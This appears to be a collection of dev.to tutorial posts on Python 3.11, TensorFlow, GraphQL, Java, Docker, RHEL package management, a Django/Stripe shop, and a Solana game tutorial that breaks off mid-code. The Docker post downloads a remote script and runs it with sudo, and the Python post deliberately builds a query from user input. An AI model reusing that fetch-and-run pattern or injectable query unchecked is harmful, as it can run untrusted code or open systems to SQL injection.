choices=levels.keys(), # ... list them as arguments ...
default="CRITICAL",
type=str.upper) # (make it case insensitive)
args = parser.parse_args()
# ... and apply the chosen one
logging.basicConfig(level=levels[args.level])
```
## [TOML](https://github.com/toml-lang/toml) built-in support
Python 3.11 is adding the [tomllib](https://docs.python.org/3.11/library/tomllib.html#module-tomllib) to the standard library.
[TOML - Tom's Obvious, Minimal Language](https://github.com/toml-lang/toml), is a minimal configuration file format that's easy to read due to obvious semantics. I often find it better than YAML for simple configurations.
Take the following TOML file:
```toml
title = "TOML Example"
[owner]
name = "Tom Preston-Werner"
dob = 1979-05-27T07:32:00-08:00 # First class dates
[database]
server = "192.168.1.1"
ports = [ 8000, 8001, 8002 ]
connection_max = 5000
enabled = true
[servers]
# Indentation (tabs and/or spaces) is allowed but not required
[servers.alpha]
ip = "10.0.0.1"
dc = "eqdc10"
[servers.beta]
ip = "10.0.0.2"
dc = "eqdc10"
# ... more config
```
With python 3.11, just do:
```python
import tomllib
def main() -> None:
with open("configuration.toml", "rb") as f:
data = tomllib.load(f)
print(data)
if __name__ == "__main__":
main()
```
The result, `data`, holds a dictionary with all the config and proper types (see the `datetime` here ?):
```
{'title': 'TOML Example', 'owner': {'name': 'Tom Preston-Werner', 'dob': datetime.datetime(1979, 5, 27, 7, 32, tzinfo=datetime.timezone(datetime.timedelta(days=-1, seconds=57600)))}, 'database': {'server': '192.168.1.1', 'ports': [8000, 8001, 8002], 'connection_max': 5000, 'enabled': True}, 'servers': {'alpha': {'ip': '10.0.0.1', 'dc': 'eqdc10'}, 'beta': {'ip': '10.0.0.2', 'dc': 'eqdc10'}}}
```
## 🤔 `LiteralString` ??
Ok, I must admit I didn't even know about those `LiteralString` before reading the release notes... But they are quite nice !
**The theory**
When a function accepts a `LiteralString` instead of a `str`, it allows type checks to fail when an argument is passed that contains some dynamic, user-provided value. It is mostly useful with databases, to avoid SQL injections.
**In practice**
I couldn't make it work. Here is my code, which runs perfectly well, without any of the errors defined in [PEP 675](https://peps.python.org/pep-0675/):
```python
from typing import LiteralString
import argparse
def run_query(sql: LiteralString) -> None:
print(f"Executing: {sql}")
if __name__ == "__main__":
static_table: str = "bar"
parser = argparse.ArgumentParser()
parser.add_argument("-t", "--table", required=True)
args = parser.parse_args()
# ok
run_query("SELECT foo FROM bar")
run_query("SELECT " + 'foo' + f" FROM {static_table}")
# should fail (dynamic argument)
run_query(f"SELECT foo from {args.table}")
```
All of this compiles and runs fine from my `python:3.11.0` docker image - presumably because `LiteralString`, like other type hints, is only enforced by a static type checker such as mypy or pyright, not by the interpreter at runtime. If you understand this feature, please let me know in the comments!
## And much more !
Have a look at the release notes for more awesome new features: [What’s New In Python 3.11](https://docs.python.org/3.11/whatsnew/3.11.html)
Let me know in the comments what *you* found interesting in this release!
| derlin |
1,229,716 | Day-19 of Machine Learning: | Day-19 of Machine Learning: I. Basic template of TensorFlow implementation: 1. construct... | 19,490 | 2022-10-25T18:09:18 | https://dev.to/ank1tas/day-19-of-machine-learning-1cfc | beginners, machinelearning, tensorflow, neuralnetwork | Day-19 of Machine Learning:
I. Basic template of TensorFlow implementation:
#### 1. construct the network
```python
model = Sequential(
[
tf.keras.Input(shape=(400,)), #specify input size
Dense(25, activation='sigmoid'),
Dense(15, activation='sigmoid'),
Dense(1, activation='sigmoid')
], name = "my_model"
)
```
Keras Sequential model and Dense Layer with sigmoid activations.
#### 2. loss function
```python
model.compile(
loss=tf.keras.losses.BinaryCrossentropy(),
optimizer=tf.keras.optimizers.Adam(0.001),
)
```
Here, for **binary classification**, BinaryCrossentropy() is used. We can also use MeanSquaredError() for linear regression.
#### 3. gradient descent to fit the weights of the model to the training data
```python
model.fit(
X,y,
epochs=20
)
```
---
II. Got to know about different Activation
##### - Linear Activation:
Activation **a = g(Z) = Z**
where Z = W.X + b
**Output y** can be any real number **(positive or negative)**
##### - Sigmoid Activation:
Activation **a = g(Z) = 1 / (1 + e ^ (-Z))**.
**Output y** is a value between **0 and 1**, i.e. suited for **binary classification**
##### - ReLU Activation (Rectified Linear Activation):
Activation **a = g(Z) = max (0, Z)**.
**Output y** will be any **non-negative real number**
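The three activations above can be sketched in plain Python to make the formulas concrete:

```python
import math

def linear(z):
    # a = g(Z) = Z
    return z

def sigmoid(z):
    # a = g(Z) = 1 / (1 + e^(-Z))
    return 1 / (1 + math.exp(-z))

def relu(z):
    # a = g(Z) = max(0, Z)
    return max(0.0, z)

print(linear(-1.5))  # -1.5
print(sigmoid(0))    # 0.5
print(relu(-3))      # 0.0
print(relu(2))       # 2
```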
---
III. How to choose Activation?
We can choose different activation within a Neural Network for separate layers and activations can be chosen accordingly requirement and goal of the Neural Network. However some recommendations are,
- A neural network with many layers but no activation function is not effective. A neural network with **only linear activations** is equivalent to one with **no activation function** at all.
- ReLU is often used over sigmoid activation. Firstly, **ReLU is a bit faster, as it does less computation (max of 0 and Z)** than sigmoid, which computes an exponential, an inverse, and so on. Secondly, gradient descent slows down where the activation curve is flat: ReLU is flat in only one region (negative inputs), whereas sigmoid flattens out in two places (both extremes).
- Use **ReLU** instead of Linear Activation in **Hidden layers**.
| ank1tas |
1,268,978 | REST API vs GraphQL | You have probably heard about GraphQL, but you might not be entirely sure how and whether it differs... | 0 | 2022-11-28T08:23:18 | https://dev.to/documatic/rest-api-vs-graphql-1a0n | node, graphql, javascript, webdev | You have probably heard about GraphQL, but you might not be entirely sure how and whether it differs from REST. You're in luck, then! Today, we'll go over some fundamentals regarding both REST and GraphQL and the various use cases of each of them.
The popularity of GraphQL as a replacement for REST APIs is growing. Though it isn't necessarily a "replacement".
You will need to decide between GraphQL, REST API, or a combination of both depending on your use cases. Let's compare REST with GraphQL and learn some of the benefits of GraphQL in order to make a more informed conclusion.
## REST APIs

A REST (Representational state transfer) API is an architectural style for an application program interface (API) that uses HTTP requests to access and use data. That data can be used to GET, PUT, POST and DELETE data types, which refers to the reading, updating, creating and deleting of operations concerning resources.
A RESTful API uses HTTP methods to carry out CRUD (Create, Read, Update, and Delete) processes while working with data.
In order to facilitate caching, AB testing, authentication, and other processes, headers offer information to clients and servers.
The body houses data that a client wants to transmit to a server, like the request's payload.
## GraphQL APIs

GraphQL is a query language for APIs and a runtime for fulfilling those queries with your existing data. GraphQL provides a complete and understandable description of the data in your API, gives clients the power to ask for exactly what they need and nothing more, makes it easier to evolve APIs over time, and enables powerful developer tools. With popular known organizations like Twitter, Expedia, Shopify, to mention a few, GraphQL has been widely adopted and is primarily maintained and developed by the GraphQL Foundation.
## GraphQL vs. REST:

The key difference between GraphQL and REST APIs is that GraphQL is a query language, while REST is an architectural concept for network-based software.
Again, The way that data is supplied to the client is where GraphQL and REST diverge the most. In a REST design, a client submits an HTTP request, and data is returned as an HTTP response. In a GraphQL architecture, a client submits queries to obtain data.
## Typical Scenarios
### REST APIs
Let's say you have an API to fetch a student data. In a typical REST scenario, this is what the request/response would look like:
```javascript
// HTTP REQUEST
GET api/students/1 || api/students?id=1
// HTTP RESPONSE
{
"id": 1
"name": "john doe",
"class": 3,
"age": 11
}
```
In the example above, the response to the request sent to the server will be an object of all data about the student with id 1.
This can sometimes take a longer time depending on the size of the data due to the over-fetching nature of REST
### GraphQL
In GraphQL, data is fetched by strictly listing the fields needed. This avoids fetching all the data at once. Consider the GIF below for fetching user data using GraphQL.

## Things to consider when choosing between GraphQL and REST
### Security
REST API makes use of HTTP, allows encryption using Transfer Layer Security, and provides a variety of API authentication options. TLS makes assurance that data transfer between two systems is private and unaltered. Web tokens that support JavaScript Object Notation (JSON) finish the HTTP authentication process for secure data transfer from web browsers.
GraphQL's security controls are not as developed as those in the REST API. In order to make use of current features like data validation in GraphQL, developers must devise new authentication and authorization techniques.
### Usability
The REST API makes use of URI and HTTP techniques, which make it challenging for the API to anticipate what will happen when contacting a new endpoint. The lack of specified versioning requirements in REST allows providers to take their own method.
With GraphQL, you can send a request to your API and receive the precise response without the need for further additions. As a result, extremely predictable responses from GraphQL queries offer good usability. GraphQL adopts a straightforward methodology and does not version APIs.
### Performance
Developers can get data with GraphQL with just one API request. In order to avoid under- and over-fetching of data, the flexible style defines the structure of information requests and returns the same structure from the server.
REST APIs, in contrast to GraphQL, have rigid data structures that may first return irrelevant information (over-fetching). As requests take time to reach the proper data and deliver pertinent information, developers must make several calls.
### Caching
All GET endpoints for REST APIs can be cached on the server or through a CDN. They can also be stored by the client for regular use and cached by the browser. GraphQL is supplied through a single endpoint, typically (/graphql), and deviates from the HTTP spec. As a result, the queries cannot be cached the same way REST APIs can.
However, because of the available tools, caching on the client side is superior to REST. The schema and type system of GraphQL are used by some of the clients employing caching layers (Apollo Client, URQL), allowing them to keep a cache on the client side.
### Error Handling
Every GraphQL request, success or error returns a 200 status code. This is a visible difference compared to REST APIs where each
status code points to a certain type of response.
| Status Code | REST | GraphQL |
| :---: | :---: | :---: |
|200 |Ok |Ok|
|400 | Bad Request |-|
|401 | Unauthorized |-|
Errors with REST APIs can have any code other than 200, and the client handling the error should be aware of all possible codes.
Any legitimate answer in GraphQL should be 200, including data and error responses. The client side tooling will assist in managing errors more effectively. Errors are handled as part of the response body under a particular errors object.
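A hypothetical error payload illustrating this shape (the `errors` key is defined by the GraphQL spec; the message and path values here are illustrative):

```json
{
  "data": null,
  "errors": [
    {
      "message": "Student with id 999 not found",
      "path": ["student"]
    }
  ]
}
```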
## Conclusion
Lets take a recap of what we've discussed above.
| REST | GraphQL |
| :---: | :---: |
| An architectural style largely viewed as a conventional standard for designing APIs | A query language for solving common problems when integrating APIs |
| Simplifying work with multiple endpoints requires expensive custom middleware | Allows for schema stitching and remote data fetching |
| Doesn't offer type-safety or auto-generated documentation | Offers type-safety and auto-generated documentation |
|Response output usually in XML, JSON, and YAML | Response output in JSON|
| Supports multiple API versions | No API versioning required |
| Uses caching automatically | Lacks in-built caching mechanism |
| Deployed over a set of URLs where each of them exposes a single resource | Deployed over HTTP using a single endpoint that provides the full capabilities of the exposed service |
|Uses a server-driven architecture | Uses a client-driven architecture|
With the carefully curated differences above, I hope you will be able to choose which of the technologies to use depending on your use case.
**Happy Hacking!**

Please follow, like and share this article. It will help us lot. Thank you. | qbentil |
1,229,757 | 2022 State of Java Ecosystem Report by New Relic | Hey, Java community 👋 I’m Daniel with New Relic. I wanted to share a 2022 State of the Java... | 0 | 2022-10-25T20:05:20 | https://dev.to/newrelic/2022-state-of-java-ecosystem-report-by-new-relic-3ne8 | java, devops | Hey, Java community 👋
I’m Daniel with New Relic. I wanted to share a [2022 State of the Java Ecosystem Report](https://newrelic.com/resources/report/2022-state-of-java-ecosystem?utm_source=devto&utm_medium=community&utm_campaign=global-fy-23q3-java_community_outreach) that New Relic recently published using data gathered in January 2022 from millions of anonymized applications that provided performance data.
One highlight we found is that Java 11 is the new standard. More than 48% of applications are now using Java 11 in production, with Java 8 a close second, used by 46.45% of applications in production.
The goal of this report is to provide context and insights into the state of the Java ecosystem today. The following categories were examined:
➡️ The most used version in production
➡️ The most popular vendors
➡️ The rise of containers
➡️ The most common heap size configurations
➡️ The most used garbage collection algorithms
**Take a look at more highlights and the state of the Java ecosystem [here](https://newrelic.com/resources/report/2022-state-of-java-ecosystem?utm_source=devto&utm_medium=community&utm_campaign=global-fy-23q3-java_community_outreach).**🤓
---
_Join the [New Relic Slack community](https://get.newrelic.com/MzQxLVhLUC0zMTAAAAGHlVlC-d2ZVCwNLc_hpcLD836-j2gmD6sZkxkygeaaSTPg-4QlmIY6omb5Gt1rHHzeU1xsqJc=) to continue the conversation with hundreds of other developers using New Relic._
_Not an existing New Relic user? [Sign up for a free account](https://newrelic.com/signup/?utm_source=devto&utm_medium=community&utm_campaign=global-fy23-q3-dev_to_techupdates) to get started!_
| alvaradodaniel3 |
1,229,974 | GoodBye Webpack and Hello turbopack | I will write about TurboPack | 0 | 2022-10-25T20:38:02 | https://dev.to/praneethkumarpidugu/bye-bye-webpack-and-hello-turbopack-204m | turbopack, nextjs, vercel, webdev | I will write about TurboPack | praneethkumarpidugu |
1,229,985 | Install Docker engine to a development Linux box - easy way | This method should only be used in development boxes not in production scenarios according to docker... | 0 | 2022-10-25T21:21:31 | https://dev.to/paul8989/install-docker-engine-to-a-development-linux-box-easy-way-180j | This method should only be used in development boxes not in production scenarios according to docker official documentation. Also validate the script before executing. You should not run this script to upgrade your existing docker engine, it may cause issues.
```shell
curl -fsSL https://get.docker.com -o get-docker.sh
sudo sh get-docker.sh
```
I found it really easy to get up and running for testing with docker on my raspberry pi4 running on Ubuntu 20.04.
References:
https://docs.docker.com/engine/install/ubuntu/ | paul8989 | |
1,230,263 | Learning about SSG features with Docusaurus | This week I worked with Docasaurus to learn about another popular SSG to improve my SSG. ... | 20,715 | 2022-10-27T02:54:53 | https://dev.to/pdr0zd/learning-about-ssg-features-with-docusarus-146e | This week I worked with Docusaurus to learn about another popular SSG so I could improve my own SSG.
# Installing Docusaurus
Docusaurus wasn't too difficult to install, and it lets you edit a document and immediately see the changes in the browser. Setting it up was as simple as running `npm init docusaurus@latest my-website classic`, replacing `my-website` with the name of your site. Afterwards I deployed my Docusaurus site to GitHub Pages. [Page](https://p-dr0zd.github.io/pdrozdSSG-Docusaurus/)
# Features I Added
[eefb760](https://github.com/P-DR0ZD/pdrozd-ssg/commit/eefb760a5620a5ee753c23b25800561e46333c0f)
[Issue Markdown](https://github.com/P-DR0ZD/pdrozd-ssg/issues/14)
Full Markdown support. With the help of [Python-Markdown/markdown](https://github.com/Python-Markdown/markdown), I finally added complete Markdown support.
[Issue Tags](https://github.com/P-DR0ZD/pdrozd-ssg/issues/15)
HTML meta tags. I added a meta tag for the description and a robots tag, which tells search engines which pages to index and which to skip.
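As a rough sketch of what generating those tags involves (a hypothetical helper for illustration, not the SSG's actual code):

```python
def build_meta_tags(description: str, noindex: bool = False) -> str:
    """Render <meta> tags for a page's <head>: description plus robots."""
    robots = "noindex, nofollow" if noindex else "index, follow"
    return "\n".join([
        f'<meta name="description" content="{description}">',
        f'<meta name="robots" content="{robots}">',
    ])

print(build_meta_tags("My SSG demo page"))
```

Pages that should stay out of search results would be rendered with `noindex=True`.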
# What's Next
Next I want to add
- Choosing Output Directory
- CSS support
| pdr0zd | |
1,230,448 | Chapter 14. Installing and Updating Software Packages | A. Registering Systems for Red Hat Support Red Hat Subscription Management There are four basic tasks... | 0 | 2022-10-26T05:27:21 | https://dev.to/nurulkhofifaaenun/chapter-14-installing-and-updating-software-packages-4ai | **A. Registering Systems for Red Hat Support**
Red Hat Subscription Management
There are four basic tasks performed with the Red Hat Subscription Management tools:
1). Register a system to associate that system with a Red Hat account, so that Subscription Manager can uniquely inventory the system. When no longer in use, a system may be unregistered.
2). Subscribe a system to entitle it to updates for selected Red Hat products. Subscriptions have specific support levels, expiration dates, and default repositories. The tools can auto-attach or select specific entitlements. As needs change, subscriptions may be removed.
3). Enable repositories to provide software packages. Several repositories are enabled by default with each subscription, but other repositories such as updates or source code can be enabled or disabled as needed.
4). Review and track available or consumed entitlements. Subscription information can be viewed locally on a specific system or, for an account, either on the Red Hat Customer Portal Subscriptions page or in Subscription Asset Manager (SAM).
Registering a System
There are different ways to register a system with the Red Hat Customer Portal: a graphical interface, reachable through a GNOME application or the Web Console service, and command-line tools. To register with the GNOME application, launch Red Hat Subscription Manager by selecting Activities, typing subscription in the Type to search... field, and clicking Red Hat Subscription Manager. Enter the appropriate password when prompted to authenticate. To register the system, click the Register button in the Subscriptions window.
Once registered, the system automatically has a subscription attached if one is available. After the system is registered and a subscription has been attached, close the Subscriptions window. The system is now properly subscribed and ready to receive updates or install new software from Red Hat.
Registering from the Command Line
1. Register a system to a Red Hat account:
[user@host ~]$ subscription-manager register --username=yourusername \
--password=yourpassword
2. View available subscriptions:
[user@host ~]$ subscription-manager list --available | less
3. Auto-attach a subscription:
[user@host ~]$ subscription-manager attach --auto
4. Alternatively, attach a subscription from a specific pool in the list of available subscriptions:
[user@host ~]$ subscription-manager attach --pool=poolID
5. View consumed subscriptions:
[user@host ~]$ subscription-manager list --consumed
6. Unregister the system:
[user@host ~]$ subscription-manager unregister
**B. Explaining and Investigating RPM Software Packages**
Software Packages and RPM
The RPM Package Manager provides a standard way to package software for distribution. This is much simpler than working with software that has merely been extracted into the file system from an archive. It lets administrators track which files a software package installed and which need to be removed if it is uninstalled, and check that supporting packages are present when it is installed.
Information about installed packages is stored in a local RPM database on each system. All software provided by Red Hat for Red Hat Enterprise Linux is delivered as RPM packages. RPM package file names consist of four elements (plus the .rpm suffix): name-version-release.architecture:
1. NAME is one or more words describing the contents (coreutils).
2. VERSION is the version number of the original software (8.30).
3. RELEASE is the release number of the package based on that version, set by the packager, who may not be the original software developer (4.el8).
4. ARCH is the processor architecture the package was compiled to run on. noarch indicates that this package's contents are not architecture-specific (as opposed to x86_64 for 64-bit, aarch64 for 64-bit ARM, and so on).
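To make the four elements concrete, here is a small illustrative parser (a sketch for this chapter, not a Red Hat tool). Splitting from the right keeps dashes inside the NAME intact, since VERSION and RELEASE never contain dashes:

```python
def parse_rpm_filename(filename: str) -> dict:
    """Split name-version-release.architecture(.rpm) into its four elements."""
    base = filename[:-4] if filename.endswith(".rpm") else filename
    base, _, arch = base.rpartition(".")             # rightmost dot: architecture
    name_version, _, release = base.rpartition("-")  # rightmost dash: release
    name, _, version = name_version.rpartition("-")  # next dash: version
    return {"name": name, "version": version, "release": release, "arch": arch}

print(parse_rpm_filename("coreutils-8.30-4.el8.x86_64.rpm"))
# {'name': 'coreutils', 'version': '8.30', 'release': '4.el8', 'arch': 'x86_64'}
```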
Updating Software with RPM Packages
Red Hat does not require older packages to be installed and then patched. To update software, RPM removes the older version of the package and installs the new one. Updates usually preserve configuration files, but the packager of the new version defines the exact behavior.
Examining RPM Packages
The rpm utility is a low-level tool that can get information about the contents of package files and about installed packages. It takes its information from the local database of installed packages. However, the -p option can be used to query a downloaded package file instead.
- The general form of a query is:
rpm -q [select-options] [query-options]
- RPM queries: general information about installed packages
rpm -qa: list all installed packages
rpm -qf FILENAME: find out which package provides FILENAME

- RPM queries: information about a specific package
rpm -q PACKAGENAME: list the currently installed version of the package

- rpm -qi PACKAGENAME: get detailed information about the package
- rpm -ql PACKAGENAME: list the files installed by the package

- rpm -qc PACKAGENAME: list only the configuration files installed by the package

- rpm -qd PACKAGENAME: list only the documentation files installed by the package

- rpm -q --scripts PACKAGENAME: list the shell scripts that run before or after the package is installed or removed

- rpm -q --changelog PACKAGENAME: list the change-log information for the package

Querying a local package file:

Installing RPM Packages
The rpm command can be used to install an RPM package that has been downloaded to a local directory.

Summary of RPM Query Commands
Installed packages can be queried directly with the rpm command. Add the -p option to query a package file before installation.

**C. Installing and Updating Software Packages with Yum**
Managing Software Packages with Yum
Yum is designed to be a better system for managing RPM-based software installation and updates. The yum command is used to install, update, remove, and get information about software packages and their dependencies.
Finding Software with Yum
- yum help displays usage information.
- yum list displays installed and available packages.

- yum search KEYWORD lists packages with the keyword found in the name and summary fields only.
To search for packages that have "web server" in the name, summary, and description fields, use search all:

- yum info PACKAGENAME returns detailed information about a package, including the disk space required for installation.
To get information about the Apache HTTP Server:

- yum provides PATHNAME displays packages that match the specified path name (which often includes wildcard characters).
To find packages that provide the /var/www/html directory, use:

Installing and removing software with yum
- yum install PACKAGENAME obtains and installs a software package, including any dependencies.


- yum update PACKAGENAME obtains and installs a newer version of the specified package, including any dependencies. Generally the process tries to preserve configuration files in place, but in some cases they may be renamed if the packager thinks the old one will not work after the update. With no PACKAGENAME specified, it installs all relevant updates.

- yum remove PACKAGENAME removes an installed software package, including any supported packages.

Installing and removing groups of software with yum
yum also has the concept of groups, which are collections of related software installed together for a particular purpose. In Red Hat Enterprise Linux 8, there are two kinds of groups. Regular groups are collections of packages. Environment groups are collections of regular groups. The packages or groups provided by a group may be mandatory (they must be installed if the group is installed), default (normally installed if the group is installed), or optional (not installed when the group is installed, unless specifically requested).
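To illustrate the mandatory/default/optional distinction, here is a small sketch of the selection rule (not how yum is implemented; the group dictionary is hypothetical):

```python
def packages_to_install(group: dict, requested_optional=frozenset()) -> set:
    """Mandatory and default packages always install; optional only on request."""
    selected = set(group["mandatory"]) | set(group["default"])
    selected |= set(group["optional"]) & set(requested_optional)
    return selected

demo_group = {  # hypothetical group, loosely modeled on 'yum group info' output
    "mandatory": ["httpd"],
    "default": ["mod_ssl"],
    "optional": ["mod_ldap"],
}
print(sorted(packages_to_install(demo_group)))  # ['httpd', 'mod_ssl']
```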
Like yum list, the yum group list command shows the names of installed and available groups.

Some groups are normally installed through environment groups and are hidden by default. List these hidden groups with the yum group list hidden command.
- yum group info displays information about a group, including a list of mandatory, default, and optional package names.

- yum group install installs a group, which installs its mandatory and default packages and the packages they depend on.

Viewing transaction history
- All install and remove transactions are logged in /var/log/dnf.rpm.log.

- yum history displays a summary of install and remove transactions.

- The history undo option reverses a transaction.

**D. Enabling Yum Software Repositories**
Enabling Red Hat software repositories
Registering a system with the subscription management service automatically configures access to software repositories based on the attached subscriptions. To view all available repositories:

The yum config-manager command can be used to enable or disable repositories. To enable a repository, the command sets the enabled parameter to 1. For example, the following command enables the rhel-8-server-debug-rpms repository:

Creating Yum Repositories
Create a Yum repository with the yum config-manager command. The following command creates a file named /etc/yum.repos.d/dl.fedoraproject.org_pub_epel_8_Everything_x86_64_.repo with the output shown.

Modify this file to provide customized values and the location of a GPG key. Keys are stored at various locations on the remote repository site, such as http://dl.fedoraproject.org/pub/epel/RPM-GPG-KEY-EPEL-8. Administrators should download the key to a local file rather than allowing yum to retrieve the key from an external source. For example:

RPM Configuration Packages for Local Repositories
The following command installs the Red Hat Enterprise Linux 8 EPEL repository package:

Configuration files often list multiple repository references in a single file. Each repository reference begins with a single-word name in square brackets.

**E. Managing Package Module Streams**
Managing modules using Yum
To handle modular content, the yum module command has been added. Otherwise, yum works with modules just as it does with regular packages.
To display a list of available modules, use yum module list:

To list the module streams for a particular module and retrieve their status:

To display module details:

Install a module using its default stream and profile:

To verify the status of the installed module stream and profile:

To remove an installed module:

After a module is removed, its module stream is still enabled. To verify that the module stream is still enabled:

To disable a module stream:

Switching Module Streams
To list the packages installed from a module; in the example below, the postgresql:9.6 module is installed:

Remove the packages listed by the previous command, and mark the module profiles for removal:

After removing the module profile, reset the module stream with the yum module reset command.

To enable a different module stream and install the module:

| nurulkhofifaaenun | |
1,230,514 | Free Django eCommerce - Use Products from Stripe | Mini eCommerce for Django with products download from Stripe - Open-source project (MIT License). | 0 | 2022-10-26T07:43:49 | https://blog.appseed.us/django-ecommerce-download-products-from-stripe/ | webdev, ecommerce, django, stripe | ---
title: Free Django eCommerce - Use Products from Stripe
published: true
description: Mini eCommerce for Django with products download from Stripe - Open-source project (MIT License).
tags: webdev, ecommerce, django, stripe
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/wmgibre8nh5u5lzhaj79.jpg
canonical_url: https://blog.appseed.us/django-ecommerce-download-products-from-stripe/
---
Hello coders!
This article presents an open-source [Django & Stripe Mini eCommerce](https://github.com/app-generator/sample-django-stripe) starter that builds product pages using the information saved in Stripe Dashboard. Once the `Stripe` Secrets are provided in the .env file, the superusers are able to pull the products from Stripe and edit the information via a simple UI. The sources, released under the MIT License, can be used in commercial projects and eLearning activities. `Thanks for reading!`
- 👉 [Django & Stripe eCommerce](https://github.com/app-generator/sample-django-stripe) - `source code`
- 🚀 Free [support](https://appseed.us/support/) via Email & Discord (just in case)
{% embed https://www.youtube.com/watch?v=qP3QGkvBq74 %}
---
## ✨ How it works
The sources come with a default product, saved in the local filesystem. If the user initiates the purchase, the application warns that the Stripe Secrets are not provided and the flow cannot continue. The steps, as explained in the video, are the following:
> 👉 **Step #1** - Clone the source code from the [public repository](https://github.com/app-generator/sample-django-stripe)
```bash
$ git clone https://github.com/app-generator/sample-django-stripe.git
$ cd sample-django-stripe
```
---
> 👉 **Step #2** - Follow up the usual set up for a Django Project
```bash
$ python -m venv env
$ source env/bin/activate
$ pip install -r requirements.txt
```
---
> 👉 **Step #3** - Migrate the database & Create a Superuser
```bash
$ python manage.py migrate # migrate DB
$ python manage.py createsuperuser # create the app King
```
---
> 👉 **Step #4** - Create `.env` file in the root of the project
```env
DEBUG=True
SECRET_KEY=WhateEver_KEY
STRIPE_SECRET_KEY=<FROM_STRIPE> # <-- MANDATORY
STRIPE_PUBLISHABLE_KEY=<FROM_STRIPE> # <-- MANDATORY
# Server Address (used by Stripe callback)
# Should be the URL used to start the APP
DOMAIN_URL=http://localhost:8000/
```
The most important settings are the Stripe secrets that authorize the payment flow using Stripe as the payment provider. The values can be found in your Stripe Dashboard; newcomers should use "TEST" mode while experimenting.
Once the `env` file is edited and saved, we can safely start the project and import the data from Stripe using a simple UI.
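As a sketch of what the import step does with each Stripe record (the field names below are assumptions for illustration, not the app's actual model):

```python
def stripe_product_to_local(product: dict, price: dict) -> dict:
    """Flatten a Stripe Product plus its Price into local, editable fields."""
    return {
        "stripe_id": product["id"],
        "name": product.get("name", ""),
        "description": product.get("description") or "",
        "image": (product.get("images") or [""])[0],
        # Stripe amounts are in the smallest currency unit (e.g. cents)
        "price": price["unit_amount"] / 100,
        "currency": price["currency"],
    }

sample = stripe_product_to_local(
    {"id": "prod_123", "name": "One Shirt", "images": ["https://example.com/s.png"]},
    {"unit_amount": 1900, "currency": "usd"},
)
print(sample["price"])  # 19.0
```

Each mapped record can then be saved into the local database, where superusers edit it through the UI.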
---
> 👉 **Stripe Dashboard** - With Three products defined

---
Before import, the app warns the users to authenticate and add more products using a superuser account.

---
On the page reserved for superusers, if the configuration is correct, the information from Stripe becomes available and editable.

---
For each product, all product fields are editable using a minimal UI: price, name, description, and IMAGES. A live payment flow should look like this:

---
The sample used in the video demonstration can be found on GitHub with all the products already downloaded from Stripe:
{% embed https://github.com/app-generator/mini-ecomm %}
---
> `Thanks for reading!` For more tools and support feel free to access:
- 👉 More [Developer Tools](https://appseed.us/developer-tools/) provided by `AppSeed`
- 👉 Free [support](https://appseed.us/support/) via Email & Discord (just in case)
| sm0ke |
1,230,532 | Build an RPG game on Solana | Dungeon3: Demo Click on the image to watch the Demo or click Here. ... | 0 | 2022-10-26T16:35:57 | https://dev.to/aeither/build-an-rpg-game-on-solana-45he | solana, kaboom, thirdweb, react | ## Dungeon3: Demo
[](https://youtu.be/VEt2Kg1jjBc)
Click on the image to watch the Demo or click [Here](https://youtu.be/VEt2Kg1jjBc).
## Overview
Solana is one of the most exciting layer 1 blockchain platforms. Unlike Ethereum, it reaches consensus by combining proof of stake with proof of history. Code deployed on the chain is called a program; in Ethereum, the equivalent is a smart contract. Solana takes a different approach, which means we also need to learn new concepts to build on it. Building on Solana is hard. It is well known among Solana builders as "chewing glass."
There is no need to be concerned. In this guide, we will build an RPG game on Solana. We will cover the complete stack of the app by breaking down each step: the program, the NFT collection drop, the frontend, and the game.
We are going to start with the program, which allows the user to store in-game progress on-chain. We will use a beginner-friendly programming language, Python. This is possible thanks to the new Seahorse framework, which we will use inside the Solana Playground web editor. Next we will create an NFT collection drop: every player can mint a free NFT to get started with the game. Then we will use Kaboom.js to create the game. It is a game library by Replit that lets us build browser games in JavaScript, so you don't have to download a game engine such as Unity.
The tools we will cover include:
### Solana
Solana is well known for being fast and cheap. It provides the web3.js SDK, a CLI, the Solana Program Library (SPL), and interfaces to query the Solana network. We can write programs in Rust the traditional way or with Anchor. [Read more](https://solana.com/news/getting-started-with-solana-development)
Rust has a steep learning curve, which makes it difficult for newcomers to build on Solana. Don't worry because we are going to build the program with the brand new Seahorse language. It lets you write Solana programs in Python. Developers gain Python's ease-of-use while still having the same safety guarantees as every Rust program on the Solana chain. [Seahorse Website](https://seahorse-lang.org/)
### Thirdweb
Thirdweb simplifies the Solana development workflow with an intuitive dashboard and SDKs to deploy and interact with your programs. [Thirdweb website](https://thirdweb.com/)
### Kaboom
Kaboom is a Javascript game programming library that helps you make games fast and fun. Building games in the browser has never been so easy thanks to Kaboom from Replit. [Github](https://github.com/replit/kaboom)
A quick peek at the repository structure:
```
📦 dungeon3
├─ art_layers // Layers of PNGs to be use with Hashlips Engine
├─ program // Solana program to save player progress and typescript tests
├─ src
│ ├─ component
│ │ └─ kaboom // The RPG game
│ ├─ contexts // Wallet provider contex
│ ├─ hooks // Web3 methods and utilities
│ ├─ utils // Constants and the program IDL
│ ├─ App.tsx // The game page
│ └─ MintPage
└─ public
└─ assets // Game audios and images
```
Let's go!
## Prerequisites
- Install [Node.js](https://nodejs.org/en/)
- Basic familiarity with JavaScript and Python.
## Setup
_Skip any step that you have already completed before._
Install the [Solana Tool Suite](https://docs.solana.com/cli/install-solana-cli-tools#use-solanas-install-tool) to interact with a Solana cluster. We will use its command-line interface, also known as the CLI. It provides the most direct, flexible, and secure access to your Solana accounts. After the installation, you may need to expose the path by copy-pasting the script that shows up in your terminal. Check the version to verify that you have installed it correctly.
```text
$ solana --version
solana-cli 1.13.0 (src:devbuild; feat:2324890699)
```
Let's use the CLI to generate a keypair. A keypair is a public key and its corresponding private key for accessing an account. The public key is your address: you can share it with your friends to receive funds, and it is visible to them when you send them assets. You must keep your private key secret, because anyone who holds it can move your assets.
Generate a new keypair with:
```text
solana-keygen new
```
It will write a JSON file to the keypair path on your computer. The file contains an array of bytes; a byte is just a number from 0 to 255. You can find the path by running:
```text
$ solana config get
Config File: /Users/USERNAME/.config/solana/cli/config.yml
RPC URL: https://api.devnet.solana.com
WebSocket URL: wss://api.devnet.solana.com/ (computed)
Keypair Path: /Users/USERNAME/.config/solana/id.json
Commitment: confirmed
```
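For the curious: the array in `id.json` holds 64 bytes, where the first 32 are the Ed25519 secret seed and the last 32 are the public key. A stdlib-only sketch using a throwaway array (never print or share a real key):

```python
import json

# A throwaway 64-number array, NOT a real key: id.json has exactly this shape.
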